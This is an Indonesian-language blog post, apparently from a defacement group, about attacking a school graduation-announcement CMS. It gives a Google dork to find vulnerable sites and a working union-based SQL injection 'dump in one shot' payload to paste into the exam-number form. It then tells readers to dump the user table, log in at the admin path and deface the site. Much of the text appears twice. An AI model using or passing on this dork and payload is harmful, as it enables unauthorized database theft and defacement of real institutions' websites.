Posted by : NisaStar7
Wednesday 19 June 2019
Deface Metode SQL Injection CMS Kelulusan
Date : 16 Juni 2019
Author : Ulin + Endang
Garuda Security hacker
CMS github :https://github.com/slametbsan/kelulusan/
Vuln : SQL
######################
Dork :
intext:"Masukkan nomor ujianmu pada form yang disediakan"
Masukin Dios di form yang ada
' union select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6,7,8-- -
(@Ulin yang bikin diosnya, karena w noob SQL Injection manual)
Date : 16 Juni 2019
Author : Ulin + Endang
Garuda Security hacker
CMS github :https://github.com/slametbsan/kelulusan/
Vuln : SQL
######################
Dork :
intext:"Masukkan nomor ujianmu pada form yang disediakan"
Masukin Dios di form yang ada
' union select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6,7,8-- -
(@Ulin yang bikin diosnya, karena w noob SQL Injection manual)
Maka akan muncul database nya
Selanjutnya silakan dump manual sendiri gan.
Selanjutnya silakan dump manual sendiri gan.
Dump : un_user
Login : site/path/admin
Kalo ada database utama webnya yah dump ajah :vsekalian
And enjoys
Login : site/path/admin
Kalo ada database utama webnya yah dump ajah :vsekalian
And enjoys